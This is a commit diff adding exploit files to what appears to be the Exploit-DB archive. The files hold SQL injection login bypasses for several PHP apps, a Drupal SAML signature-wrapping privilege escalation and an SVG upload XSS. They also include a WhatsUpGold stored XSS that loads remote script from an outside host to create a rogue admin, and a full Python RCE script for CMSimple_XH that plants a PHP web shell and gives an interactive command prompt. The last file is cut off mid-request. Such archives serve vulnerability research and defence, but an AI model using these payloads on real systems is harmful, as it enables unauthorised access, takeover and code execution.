DB: 2021-10-02
10 changes to exploits/shellcodes Exam Form Submission System 1.0 - SQL Injection Authentication Bypass Drupal Module MiniorangeSAML 8.x-2.22 - Privilege escalation via XML Signature Wrapping Blood Bank System 1.0 - SQL Injection / Authentication Bypass Phpwcms 1.9.30 - File Upload to XSS Vehicle Service Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated) Dairy Farm Shop Management System 1.0 - SQL Injection Authentication Bypass WhatsUpGold 21.0.3 - Stored Cross-Site Scripting (XSS) CMSimple_XH 1.7.4 - Remote Code Execution (RCE) (Authenticated) Directory Management System 1.0 - SQL Injection Authentication Bypass Windows/x86 - WinExec PopCalc PEB & Export Directory Table NullFree Dynamic Shellcode (178 bytes)
This commit is contained in:
parent
f32872547a
commit
8955161978
12 changed files with 811 additions and 0 deletions
57
exploits/multiple/webapps/50366.txt
Normal file
57
exploits/multiple/webapps/50366.txt
Normal file
|
@ -0,0 +1,57 @@
|
||||||
|
# Exploit Title: WhatsUpGold 21.0.3 - Stored Cross-Site Scripting (XSS)
|
||||||
|
# Date: 09.17.2021
|
||||||
|
# Exploit Author: Andreas Finstad (4ndr34z)
|
||||||
|
# Vendor Homepage: https://www.whatsupgold.com
|
||||||
|
# Version: v.21.0.3, Build 188
|
||||||
|
# Tested on: Windows 2019 Server
|
||||||
|
# CVE : CVE-2021-41318
|
||||||
|
# Reference: https://f20.be/cves/poc-cve-2021-41318
|
||||||
|
|
||||||
|
Description:
|
||||||
|
Improper validation of strings from discovered SNMP devices, makes the application prone to stored XXS attacks.
|
||||||
|
Placing a XSS payload in one of the fields reflected onto the application, triggers the exploitation.
|
||||||
|
No CSRF protection/token on adding/posting a new user account, makes it possible to create a rouge administrator, using a staged javascript delivered through the XSS.
|
||||||
|
|
||||||
|
SNMP A nix computer placed on a subnet accessible from the server for discovery, you edit the SNMPd.conf, adding the payload:
|
||||||
|
|
||||||
|
# snmpd.conf
|
||||||
|
# An example configuration file for configuring the Net-SNMP agent ('snmpd')
|
||||||
|
# See snmpd.conf(5) man page for details
|
||||||
|
############################################################################
|
||||||
|
# SECTION: System Information Setup
|
||||||
|
# syslocation: The [typically physical] location of the system.
|
||||||
|
# Note that setting this value here means that when trying to
|
||||||
|
# perform an snmp SET operation to the sysLocation.0 variable will make
|
||||||
|
# the agent return the "notWritable" error code. IE, including
|
||||||
|
# this token in the snmpd.conf file will disable write access to
|
||||||
|
# the variable.
|
||||||
|
# arguments: location_string
|
||||||
|
sysName Evil-Device
|
||||||
|
sysLocation Somewhere Over The Rainbow
|
||||||
|
sysContact <img id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHA6Ly8xOTIuMTY4LjY2LjQ2L3guanMiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 src=x onerror=eval(atob(this.id))>
|
||||||
|
|
||||||
|
This is the base64 encoded string:
|
||||||
|
var a=document.createElement("script");a.src="http://192.168.66.46/x.js";document.body.appendChild(a);
|
||||||
|
|
||||||
|
x.js:
|
||||||
|
var vhost = window.location.protocol+'\/\/'+window.location.host
|
||||||
|
var username = "sysadmin"
|
||||||
|
var password = "me"
|
||||||
|
|
||||||
|
fetch(vhost+'/NmConsole/api/core/WebUser',{
|
||||||
|
method: 'POST',
|
||||||
|
headers: {
|
||||||
|
'Content-Length': '479',
|
||||||
|
'Accept': 'application/json',
|
||||||
|
'X-Requested-With': 'XMLHttpRequest',
|
||||||
|
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Edg/90.0.818.51',
|
||||||
|
'Content-Type': 'application/json',
|
||||||
|
'Origin': vhost,
|
||||||
|
'Referer': vhost+'/NmConsole/',
|
||||||
|
'Accept-Encoding': 'gzip, deflate',
|
||||||
|
'Accept-Language': 'nb,no;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,sv;q=0.5,fr;q=0.4',
|
||||||
|
'Connection': 'close'
|
||||||
|
},
|
||||||
|
credentials: 'include',
|
||||||
|
body: '{"HomeDeviceGroupID":0,"HomeDeviceGroupPath":"My Network","LanguageID":1033,"UserRightsMask":"0","IsDgarConfigured":false,"Groups" [1],"WebUserID":-1,"UserName":"'+username+'","AuthenticationType":1,"ApplyWebUiSessionTimeout":true,"ApplyLockoutPolicy":false,"ApplyPasswordAging":false,"ApplyPasswordComplexity":false,"ApplySessionPolicy":false,"FailedLoginCount":0,"IsLocked":false,"Password":"'+password+'","UnlockUser":false,"WebConfigurationSettings":"","id":"Wug.model.userManagement.WebUser-2"}'
|
||||||
|
});
|
35
exploits/php/webapps/50360.txt
Normal file
35
exploits/php/webapps/50360.txt
Normal file
|
@ -0,0 +1,35 @@
|
||||||
|
# Exploit Title: Exam Form Submission System 1.0 - SQL Injection Authentication Bypass
|
||||||
|
# Date: 30-09-2021
|
||||||
|
# Exploit Author: Nitin Sharma (Vidvansh)
|
||||||
|
# Vendor Homepage: https://code-projects.org
|
||||||
|
# Product link: https://code-projects.org/exam-form-submission-in-php-with-source-code/
|
||||||
|
# Version: 1.0
|
||||||
|
# Tested on: XAMPP / Windows 10
|
||||||
|
|
||||||
|
Steps-To-Reproduce:
|
||||||
|
Step 1 Go to the Product admin panel http://localhost/EXAM_FORM_SUBMISSION/admin/index.php.
|
||||||
|
Step 2 – Enter anything in username and password
|
||||||
|
Step 3 – Click on Login and capture the request in the burp suite
|
||||||
|
Step4 – Change the username to ' OR 1 -- - and password to ' OR 1 -- -.
|
||||||
|
Step 5 – Click forward and now you will be logged in as admin.
|
||||||
|
|
||||||
|
POC
|
||||||
|
POST /EXAM_FORM_SUBMISSION/admin/index.php HTTP/1.1
|
||||||
|
Host: localhost
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
|
||||||
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
||||||
|
Accept-Language: en-GB,en;q=0.5
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
Content-Length: 40
|
||||||
|
Origin: http://localhost
|
||||||
|
Connection: close
|
||||||
|
Referer: http://localhost/EXAM_FORM_SUBMISSION/admin/index.php
|
||||||
|
Cookie: PHPSESSID=2fa01e7lg9vfhtspr2hs45va76
|
||||||
|
Upgrade-Insecure-Requests: 1
|
||||||
|
Sec-Fetch-Dest: document
|
||||||
|
Sec-Fetch-Mode: navigate
|
||||||
|
Sec-Fetch-Site: same-origin
|
||||||
|
Sec-Fetch-User: ?1
|
||||||
|
|
||||||
|
email='%20OR%201%20--%20-&pass='%20OR%201%20--%20-&Login=Login
|
115
exploits/php/webapps/50361.txt
Normal file
115
exploits/php/webapps/50361.txt
Normal file
|
@ -0,0 +1,115 @@
|
||||||
|
# Exploit Title: Drupal Module MiniorangeSAML 8.x-2.22 - Privilege escalation via XML Signature Wrapping
|
||||||
|
# Date: 09/07/2021
|
||||||
|
# Exploit Author: Cristian 'void' Giustini
|
||||||
|
# Vendor Homepage: https://www.miniorange.com/
|
||||||
|
# Software Link: https://www.drupal.org/project/miniorange_saml
|
||||||
|
# Version: 8.x-2.22 (REQUIRED)
|
||||||
|
# Tested on: Linux Debian (PHP 8.0.7 with Apache/2.4.38)
|
||||||
|
# Original article: https://blog.hacktivesecurity.com/index.php/2021/07/09/sa-contrib-2021-036-notsosaml-privilege-escalation-via-xml-signature-wrapping-on-minorangesaml-drupal-plugin/
|
||||||
|
# Drupal Security Advisory URL: https://www.drupal.org/sa-contrib-2021-036
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
|
The MiniorangeSAML Drupal Plugin v. 8.x-2.22 is vulnerable to XML
|
||||||
|
Signature Wrapping Attacks that could allows an attacker to perform
|
||||||
|
privilege escalation attacks.
|
||||||
|
|
||||||
|
In order to exploit the vulnerability, the plugin must be configured
|
||||||
|
with the "Either SAML reponse or SAML assertion must be signed" options
|
||||||
|
enabled and an empty "x509 certificate".
|
||||||
|
|
||||||
|
Administrator point of view:
|
||||||
|
|
||||||
|
- Install a Drupal version (for the PoC the version 9.1.10 has been used)
|
||||||
|
|
||||||
|
- Configure an external SSO system like Auth0
|
||||||
|
|
||||||
|
- Configure the plugin with the Auth0 provider by checking the "Either
|
||||||
|
SAML response or SAML assertion must be signed" and empty "x509 certificate"
|
||||||
|
|
||||||
|
|
||||||
|
Attacker point of view:
|
||||||
|
|
||||||
|
- Register a normal user on the website
|
||||||
|
|
||||||
|
- Perform a login
|
||||||
|
|
||||||
|
- Intercept the request with Burp Suite and decode the SAMLResponse
|
||||||
|
parameter
|
||||||
|
|
||||||
|
- Inject an additional <Saml:Assertion> object before the original one
|
||||||
|
(example here:
|
||||||
|
https://gist.github.com/voidz0r/30c0fb7be79abf8c79d1be9d424c9e3b#file-injected_object-xml)
|
||||||
|
(SAMLRaider Burp extension, XSW3 payload)
|
||||||
|
|
||||||
|
<saml:Assertion ID="_evil_assertion_ID" IssueInstant="2021-06-23T21:04:01.551Z" Version="2.0"
|
||||||
|
xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion">
|
||||||
|
<saml:Issuer>urn:miniorange-research.eu.auth0.com</saml:Issuer>
|
||||||
|
<saml:Subject>
|
||||||
|
<saml:NameID Format="urn:oasis:names:tc:SAML:1.1:nameid-format:unspecified">admin</saml:NameID>
|
||||||
|
<saml:SubjectConfirmation Method="urn:oasis:names:tc:SAML:2.0:cm:bearer">
|
||||||
|
<saml:SubjectConfirmationData InResponseTo="_f1e26bb0bd40be366c543e2c3fe0215747f40dadbb" NotOnOrAfter="2021-06-23T22:04:01.551Z" Recipient="http://localhost:8080/samlassertion"/>
|
||||||
|
</saml:SubjectConfirmation>
|
||||||
|
</saml:Subject>
|
||||||
|
<saml:Conditions NotBefore="2021-06-23T21:04:01.551Z" NotOnOrAfter="2021-06-23T22:04:01.551Z">
|
||||||
|
<saml:AudienceRestriction>
|
||||||
|
<saml:Audience>http://localhost:8080</saml:Audience>
|
||||||
|
</saml:AudienceRestriction>
|
||||||
|
</saml:Conditions>
|
||||||
|
<saml:AuthnStatement AuthnInstant="2021-06-23T21:04:01.551Z" SessionIndex="_WWwvhpmMv5eJI4bwPdsPAiasFpTH8gt_">
|
||||||
|
<saml:AuthnContext> <saml:AuthnContextClassRef>urn:oasis:names:tc:SAML:2.0:ac:classes:unspecified</saml:AuthnContextClassRef>
|
||||||
|
</saml:AuthnContext>
|
||||||
|
</saml:AuthnStatement>
|
||||||
|
<saml:AttributeStatement xmlns:xs="http://www.w3.org/2001/XMLSchema"
|
||||||
|
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
|
||||||
|
<saml:Attribute Name="http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
|
||||||
|
<saml:AttributeValue xsi:type="xs:string">admin</saml:AttributeValue>
|
||||||
|
</saml:Attribute>
|
||||||
|
<saml:Attribute Name="http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddress" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
|
||||||
|
<saml:AttributeValue xsi:type="xs:string">test@example.com</saml:AttributeValue>
|
||||||
|
</saml:Attribute>
|
||||||
|
<saml:Attribute Name="http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
|
||||||
|
<saml:AttributeValue xsi:type="xs:string">test@example.com</saml:AttributeValue>
|
||||||
|
</saml:Attribute>
|
||||||
|
<saml:Attribute Name="http://schemas.xmlsoap.org/ws/2005/05/identity/claims/upn" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
|
||||||
|
<saml:AttributeValue xsi:type="xs:string">test@example.com</saml:AttributeValue>
|
||||||
|
</saml:Attribute>
|
||||||
|
<saml:Attribute Name="http://schemas.auth0.com/identities/default/connection" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
|
||||||
|
<saml:AttributeValue xsi:type="xs:string">Username-Password-Authentication</saml:AttributeValue>
|
||||||
|
</saml:Attribute>
|
||||||
|
<saml:Attribute Name="http://schemas.auth0.com/identities/default/provider" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
|
||||||
|
<saml:AttributeValue xsi:type="xs:string">auth0</saml:AttributeValue>
|
||||||
|
</saml:Attribute>
|
||||||
|
<saml:Attribute Name="http://schemas.auth0.com/identities/default/isSocial" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
|
||||||
|
<saml:AttributeValue xsi:type="xs:boolean">false</saml:AttributeValue>
|
||||||
|
</saml:Attribute>
|
||||||
|
<saml:Attribute Name="http://schemas.auth0.com/clientID" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
|
||||||
|
<saml:AttributeValue xsi:type="xs:string">8bbK44pPnBAqzN49pSuwmgdhgsZavkNI</saml:AttributeValue>
|
||||||
|
</saml:Attribute>
|
||||||
|
<saml:Attribute Name="http://schemas.auth0.com/created_at" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
|
||||||
|
<saml:AttributeValue xsi:type="xs:anyType">Wed Jun 23 2021 21:01:51 GMT+0000 (Coordinated Universal Time)</saml:AttributeValue>
|
||||||
|
</saml:Attribute>
|
||||||
|
<saml:Attribute Name="http://schemas.auth0.com/email_verified" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
|
||||||
|
<saml:AttributeValue xsi:type="xs:boolean">false</saml:AttributeValue>
|
||||||
|
</saml:Attribute>
|
||||||
|
<saml:Attribute Name="http://schemas.auth0.com/nickname" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
|
||||||
|
<saml:AttributeValue xsi:type="xs:string">test</saml:AttributeValue>
|
||||||
|
</saml:Attribute>
|
||||||
|
<saml:Attribute Name="http://schemas.auth0.com/picture" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
|
||||||
|
<saml:AttributeValue xsi:type="xs:string">https://s.gravatar.com/avatar/55502f40dc8b7c769880b10874abc9d0?s=480&r=pg&d=https%3A%2F%2Fcdn.auth0.com%2Favatars%2Fte.png</saml:AttributeValue>
|
||||||
|
</saml:Attribute>
|
||||||
|
<saml:Attribute Name="http://schemas.auth0.com/updated_at" NameFormat="urn:oasis:names:tc:SAML:2.0:attrname-format:uri">
|
||||||
|
|
||||||
|
<saml:AttributeValue xsi:type="xs:anyType">Wed Jun 23 2021 21:01:51 GMT+0000 (Coordinated Universal Time)</saml:AttributeValue>
|
||||||
|
|
||||||
|
</saml:Attribute>
|
||||||
|
|
||||||
|
</saml:AttributeStatement>
|
||||||
|
|
||||||
|
</saml:Assertion>
|
||||||
|
|
||||||
|
- Replace the username with one with higher privileges (like admin)
|
||||||
|
|
||||||
|
- Submit the request
|
||||||
|
|
||||||
|
- Successful exploitation
|
40
exploits/php/webapps/50362.txt
Normal file
40
exploits/php/webapps/50362.txt
Normal file
|
@ -0,0 +1,40 @@
|
||||||
|
# Exploit Title: Blood Bank System 1.0 - SQL Injection / Authentication Bypass
|
||||||
|
# Date: 30-9-2021
|
||||||
|
# Exploit Author: Nitin Sharma (vidvansh)
|
||||||
|
# Vendor Homepage: https://code-projects.org/blood-bank-in-php-with-source-code/
|
||||||
|
# Software Link : https://download.code-projects.org/details/f44a4ba9-bc33-48c3-b030-02f62117d230
|
||||||
|
# Version: 1.0
|
||||||
|
# Tested on: Windows 10 , Apache , Mysql
|
||||||
|
|
||||||
|
# Description : Password input is affected with authentication bypass because of improper sanitisation which lead to access to auauthorised accounts.
|
||||||
|
|
||||||
|
#Steps-To-Reproduce:
|
||||||
|
Step 1 Go to the Product admin panel http://localhost/bloodbank/login.php.
|
||||||
|
Step 2 – Enter anything in username and password
|
||||||
|
Step 3 – Click on Login and capture the request in the burp suite
|
||||||
|
Step4 – Change the username to ' OR 1 -- - and password to ' OR 1 -- -.
|
||||||
|
Step 5 – Click forward and now you will be logged in as admin.
|
||||||
|
|
||||||
|
# PoC:
|
||||||
|
|
||||||
|
GET /bloodbank/file/../bloodrequest.php?msg=Gandhi%20hospital%20have%20logged%20in. HTTP/1.1
|
||||||
|
Host: localhost
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
|
||||||
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
||||||
|
Accept-Language: en-GB,en;q=0.5
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Origin: http://localhost
|
||||||
|
Connection: close
|
||||||
|
Referer: http://localhost/bloodbank/login.php
|
||||||
|
Cookie: PHPSESSID=2fa01e7lg9vfhtspr2hs45va76
|
||||||
|
Upgrade-Insecure-Requests: 1
|
||||||
|
Sec-Fetch-Dest: document
|
||||||
|
Sec-Fetch-Mode: navigate
|
||||||
|
Sec-Fetch-Site: same-origin
|
||||||
|
Sec-Fetch-User: ?1
|
||||||
|
|
||||||
|
# Authentication Bypass:
|
||||||
|
|
||||||
|
# Go to admin login page (http://localhost/bloodbank/login.php), then use below payload as username and password =>
|
||||||
|
Username: ** Random email**
|
||||||
|
Password: ' or 1 -- -
|
35
exploits/php/webapps/50363.txt
Normal file
35
exploits/php/webapps/50363.txt
Normal file
|
@ -0,0 +1,35 @@
|
||||||
|
# Exploit Title: Phpwcms 1.9.30 - File Upload to XSS
|
||||||
|
# Date: 30/9/2021
|
||||||
|
# Exploit Author: Okan Kurtulus | okankurtulus.com.tr
|
||||||
|
# Software Link: http://www.phpwcms.org/
|
||||||
|
# Version: 1.9.30
|
||||||
|
# Tested on: Ubuntu 16.04
|
||||||
|
|
||||||
|
Steps:
|
||||||
|
|
||||||
|
1-) You need to login to the system.
|
||||||
|
http://target.com/phpwcms/login.php
|
||||||
|
|
||||||
|
2-) Creating payload with SVG extension: payload.svg
|
||||||
|
|
||||||
|
<?xml version="1.0" standalone="no"?>
|
||||||
|
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
|
||||||
|
|
||||||
|
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
|
||||||
|
<rect width="300" height="100" style="fill:rgb(255,0,0);stroke-width:3;stroke:rgb(0,0,0)" />
|
||||||
|
<script type="text/javascript">
|
||||||
|
alert("XSS!");
|
||||||
|
</script>
|
||||||
|
</svg>
|
||||||
|
|
||||||
|
|
||||||
|
3-) Go to the following link and upload the payload:
|
||||||
|
http://target.com/phpwcms/phpwcms.php?csrftoken=b72d02a26550b9877616c851aa6271be&do=files&p=8
|
||||||
|
|
||||||
|
From the menu:
|
||||||
|
|
||||||
|
file -> multiple file upload -> Select files or drop here
|
||||||
|
|
||||||
|
4-) After uploading payload, call it from the link below.
|
||||||
|
|
||||||
|
http://192.168.1.112/phpwcms/upload/
|
79
exploits/php/webapps/50364.py
Executable file
79
exploits/php/webapps/50364.py
Executable file
File diff suppressed because one or more lines are too long
32
exploits/php/webapps/50365.txt
Normal file
32
exploits/php/webapps/50365.txt
Normal file
|
@ -0,0 +1,32 @@
|
||||||
|
# Exploit Title: Dairy Farm Shop Management System 1.0 - SQL Injection Authentication Bypass
|
||||||
|
# Date: 2021-09-30
|
||||||
|
# Exploit Author: sanjay singh
|
||||||
|
# Vendor Homepage: https://phpgurukul.com/
|
||||||
|
# Software Link: https://phpgurukul.com/dairy-farm-shop-management-system-using-php-and-mysql/
|
||||||
|
# Version: v1.0
|
||||||
|
# Tested on: Windows 10
|
||||||
|
|
||||||
|
Steps-To-Reproduce:
|
||||||
|
Step 1 Go to the Product admin panel http://localhost/dfsms/index.php.
|
||||||
|
Step 2 – Enter anything in username and password
|
||||||
|
Step 3 – Click on Login and capture the request in the burp suite
|
||||||
|
Step 4 – Change the username to admin' or '1'='1 and password to dfsms
|
||||||
|
Step 5 – Click forward and now you will be logged in as admin.
|
||||||
|
|
||||||
|
POC
|
||||||
|
|
||||||
|
POST /dfsms/index.php HTTP/1.1
|
||||||
|
Host: localhost
|
||||||
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
|
||||||
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
||||||
|
Accept-Language: en-US,en;q=0.5
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
Content-Length: 57
|
||||||
|
Origin: http://localhost
|
||||||
|
Connection: close
|
||||||
|
Referer: http://localhost/dfsms/index.php
|
||||||
|
Cookie: PHPSESSID=hgjvarn4tie1nmsufdn8mf1hrl
|
||||||
|
Upgrade-Insecure-Requests: 1
|
||||||
|
|
||||||
|
username=admin%27+or+%271%27%3D%271&password=dfsms&login=
|
189
exploits/php/webapps/50367.py
Executable file
189
exploits/php/webapps/50367.py
Executable file
|
@ -0,0 +1,189 @@
|
||||||
|
# Exploit Title: CMSimple_XH 1.7.4 - Remote Code Execution (RCE) (Authenticated)
|
||||||
|
# Date: 01-10-2021
|
||||||
|
# Exploit Author: Halit AKAYDIN (hLtAkydn)
|
||||||
|
# Vendor Homepage: https://www.cmsimple-xh.org/
|
||||||
|
# Software Link: https://www.cmsimple-xh.org/?Downloads
|
||||||
|
# Version: 1.7.4
|
||||||
|
# Category: Webapps
|
||||||
|
# Tested on: Linux/Windows
|
||||||
|
|
||||||
|
|
||||||
|
# CMSimple_XH is an open source project under GPL3 license
|
||||||
|
# Includes an endpoint that allows remote access
|
||||||
|
# Backup page is misconfigured, causing security vulnerability
|
||||||
|
# User information with sufficient permissions is required.
|
||||||
|
|
||||||
|
# Example: python3 exploit.py -u http://example.com -p Admin123
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
from bs4 import BeautifulSoup
|
||||||
|
from time import sleep
|
||||||
|
import requests
|
||||||
|
import argparse
|
||||||
|
|
||||||
|
|
||||||
|
def main():
|
||||||
|
parser = argparse.ArgumentParser(description='CMSimple_XH Version 1.7.4 - Remote Code Execution (Authenticated)')
|
||||||
|
parser.add_argument('-u', '--host', type=str, required=True)
|
||||||
|
parser.add_argument('-p', '--password', type=str, required=True)
|
||||||
|
args = parser.parse_args()
|
||||||
|
print("\nCMSimple_XH Version 1.7.4 - Remote Code Execution (Authenticated)",
|
||||||
|
"\nExploit Author: Halit AKAYDIN (hLtAkydn)\n")
|
||||||
|
host(args)
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
def host(args):
|
||||||
|
#Check http or https
|
||||||
|
if args.host.startswith(('http://', 'https://')):
|
||||||
|
print("[?] Check Url...\n")
|
||||||
|
sleep(2)
|
||||||
|
args.host = args.host
|
||||||
|
if args.host.endswith('/'):
|
||||||
|
args.host = args.host[:-1]
|
||||||
|
else:
|
||||||
|
pass
|
||||||
|
else:
|
||||||
|
print("\n[?] Check Adress...\n")
|
||||||
|
sleep(2)
|
||||||
|
args.host = "http://" + args.host
|
||||||
|
args.host = args.host
|
||||||
|
if args.host.endswith('/'):
|
||||||
|
args.host = args.host[:-1]
|
||||||
|
else:
|
||||||
|
pass
|
||||||
|
|
||||||
|
|
||||||
|
# Check Host Status
|
||||||
|
try:
|
||||||
|
response = requests.get(args.host)
|
||||||
|
if response.status_code == 200:
|
||||||
|
login(args)
|
||||||
|
else:
|
||||||
|
print("[-] Address not reachable!")
|
||||||
|
sleep(2)
|
||||||
|
|
||||||
|
except requests.ConnectionError as exception:
|
||||||
|
print("[-] Address not reachable!")
|
||||||
|
sleep(2)
|
||||||
|
exit(1)
|
||||||
|
|
||||||
|
|
||||||
|
def login(args):
|
||||||
|
|
||||||
|
url = args.host + "/?&login"
|
||||||
|
cookies = {
|
||||||
|
"XH_2f": "evil"
|
||||||
|
}
|
||||||
|
headers = {
|
||||||
|
"Origin": args.host,
|
||||||
|
"Content-Type": "application/x-www-form-urlencoded",
|
||||||
|
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0",
|
||||||
|
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
|
||||||
|
"Referer": args.host + "/?&login"
|
||||||
|
}
|
||||||
|
data = {
|
||||||
|
"login": "true",
|
||||||
|
"keycut": args.password,
|
||||||
|
"submit": "Login"
|
||||||
|
}
|
||||||
|
response = requests.post(url, headers=headers, cookies=cookies, data=data)
|
||||||
|
|
||||||
|
token = response.cookies.get("XH_2f")
|
||||||
|
soup = BeautifulSoup(response.text, 'html.parser')
|
||||||
|
|
||||||
|
if (soup.find("link",{"rel":"next"})['href'] != "/"):
|
||||||
|
print("[!] Login Success!\n")
|
||||||
|
sleep(2)
|
||||||
|
csrf(args,token)
|
||||||
|
else:
|
||||||
|
print("[!] Wrong password!!\n")
|
||||||
|
sleep(2)
|
||||||
|
|
||||||
|
|
||||||
|
def csrf(args, token):
|
||||||
|
|
||||||
|
url = args.host + "/?file=content"
|
||||||
|
cookies = {
|
||||||
|
"status": "adm",
|
||||||
|
"XH_2f": token
|
||||||
|
}
|
||||||
|
headers = {
|
||||||
|
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0",
|
||||||
|
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
|
||||||
|
"Referer": args.host + "/?&settings",
|
||||||
|
"Accept-Encoding": "gzip, deflate",
|
||||||
|
"Connection": "close"
|
||||||
|
}
|
||||||
|
response = requests.get(url, headers=headers, cookies=cookies)
|
||||||
|
|
||||||
|
try:
|
||||||
|
soup = BeautifulSoup(response.text, 'html.parser')
|
||||||
|
csrf = soup.find_all("input", type="hidden")[3].get("value")
|
||||||
|
create(args, token, csrf)
|
||||||
|
except Exception as e:
|
||||||
|
print(e)
|
||||||
|
else:
|
||||||
|
pass
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
def create(args, token, csrf):
|
||||||
|
|
||||||
|
payload = "<?php\r\nfile_put_contents('./evil.php', \"\\x3c\\x3fphp system(\\x24_GET['cmd']);\\x3f\\x3e\");\r\n?>\r\n"
|
||||||
|
|
||||||
|
url = args.host
|
||||||
|
cookies = {
|
||||||
|
"status": "adm",
|
||||||
|
"XH_2f": token
|
||||||
|
}
|
||||||
|
headers = {
|
||||||
|
"Origin": args.host,
|
||||||
|
"Content-Type": "application/x-www-form-urlencoded",
|
||||||
|
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0",
|
||||||
|
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
|
||||||
|
"Referer": args.host + "/?file=content&action=edit&xh_success=content",
|
||||||
|
"Accept-Encoding": "gzip, deflate"
|
||||||
|
}
|
||||||
|
data = {
|
||||||
|
"text": payload,
|
||||||
|
"file": "content",
|
||||||
|
"action": "save",
|
||||||
|
"xh_csrf_token": csrf
|
||||||
|
}
|
||||||
|
response = requests.post(url, headers=headers, cookies=cookies, data=data, allow_redirects=True)
|
||||||
|
|
||||||
|
if (response.status_code == 200):
|
||||||
|
print("[!] Create Vuln File!\n")
|
||||||
|
sleep(2)
|
||||||
|
exploit(args)
|
||||||
|
else:
|
||||||
|
print("[!] Create Failed!\n")
|
||||||
|
sleep(2)
|
||||||
|
|
||||||
|
|
||||||
|
def exploit(args):
|
||||||
|
|
||||||
|
print("[+] Exploit Done!\n")
|
||||||
|
sleep(2)
|
||||||
|
|
||||||
|
while True:
|
||||||
|
cmd = input("$ ")
|
||||||
|
url = args.host + "/evil.php?cmd=" + cmd
|
||||||
|
headers = {
|
||||||
|
"Upgrade-Insecure-Requests": "1",
|
||||||
|
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0"
|
||||||
|
}
|
||||||
|
|
||||||
|
response = requests.post(url, headers=headers, timeout=5)
|
||||||
|
|
||||||
|
if response.text == "":
|
||||||
|
print(cmd + ": command not found\n")
|
||||||
|
else:
|
||||||
|
print(response.text)
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
if __name__ == '__main__':
|
||||||
|
main()
|
32
exploits/php/webapps/50370.txt
Normal file
32
exploits/php/webapps/50370.txt
Normal file
|
@ -0,0 +1,32 @@
|
||||||
|
# Exploit Title: Directory Management System 1.0 - SQL Injection Authentication Bypass
|
||||||
|
# Date: 2021-10-01
|
||||||
|
# Exploit Author: SUDONINJA
|
||||||
|
# Vendor Homepage: https://phpgurukul.com/
|
||||||
|
# Software Link: https://phpgurukul.com/directory-management-system-using-php-and-mysql/
|
||||||
|
# Version: v1.0
|
||||||
|
# Tested on: Windows 10
|
||||||
|
|
||||||
|
Steps-To-Reproduce:
|
||||||
|
Step 1 Go to the Product admin panel http://localhost/dfsms/index.php.
|
||||||
|
Step 2 – Enter anything in username and password
|
||||||
|
Step 3 – Click on Login and capture the request in the burp suite
|
||||||
|
Step 4 – Change the username to admin' or '1'='1 and password to dfsms
|
||||||
|
Step 5 – Click forward and now you will be logged in as admin.
|
||||||
|
|
||||||
|
POC
|
||||||
|
|
||||||
|
POST /dms/admin/ HTTP/1.1
|
